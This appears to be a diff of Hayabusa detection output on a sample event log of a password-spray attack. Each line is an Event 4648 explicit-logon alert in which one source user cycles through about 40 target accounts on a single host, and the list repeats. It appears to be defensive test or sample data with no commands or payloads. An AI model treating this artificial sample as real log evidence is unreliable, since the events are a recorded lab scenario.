+2019-05-01 04:29:09.433 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cragoso  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:10.523 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: bgalbraith  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:11.590 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: bking  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:12.649 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: mdouglas  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:13.722 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: bgreenwood  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:14.787 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: baker  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:15.846 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: ssims  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:16.940 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: smisenar  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:18.019 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: Administrator  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:19.076 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jwright  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:20.162 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: dpendolino  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:21.257 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: celgee  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:22.327 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: thessman  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:23.410 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: eskoudis  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:24.477 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cdavis  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:25.557 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: mtoussain  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:26.628 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: lschifano  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:27.690 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: bhostetler  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:28.763 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: rbowes  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:29.837 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: ebooth  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:30.921 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cfleener  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:31.996 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cmoody  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:33.058 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: psmith  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:34.138 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jkulikowski  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:35.199 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: gsalinas  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:36.266 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: tbennett  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:37.375 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: econrad  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:38.439 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: smisenar  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:39.499 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jleytevidal  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:40.560 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: lpesce  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:41.637 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: sanson  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:42.734 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: sarmstrong  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:43.795 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: wstrzelec  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:44.875 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: zmathis  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:45.951 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: melliott  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:47.017 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: kperryman  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:48.096 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jorchilles  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:49.176 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jlake  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:50.264 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: edygert  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:51.340 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: drook  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:52.405 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: dmashburn  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:53.466 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cspizor  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:54.572 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cragoso  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:55.671 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: bgalbraith  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:56.741 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: bking  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:57.817 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: mdouglas  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:58.894 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: bgreenwood  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:59.965 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: baker  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:01.026 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: ssims  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:02.115 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: smisenar  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:03.191 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: Administrator  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:04.272 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jwright  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:05.348 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: dpendolino  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:06.426 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: celgee  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:07.478 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: thessman  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:08.564 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: eskoudis  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:09.668 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cdavis  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:10.717 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: mtoussain  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:11.809 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: lschifano  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:12.857 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: bhostetler  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:13.904 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: rbowes  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:14.972 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: ebooth  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:16.050 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cfleener  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:17.129 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cmoody  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:18.186 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: psmith  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:19.254 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jkulikowski  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:20.329 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: gsalinas  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:21.401 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: tbennett  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:22.487 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: econrad  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:23.577 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: smisenar  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:24.660 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jleytevidal  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:25.732 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: lpesce  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:26.794 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: sanson  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:27.863 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: sarmstrong  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:28.925 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: wstrzelec  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:29.993 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: zmathis  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:31.050 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: melliott  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:32.142 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: kperryman  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:33.206 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jorchilles  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:34.265 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jlake  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:35.340 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: edygert  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:36.403 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: drook  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:37.453 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: dmashburn  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
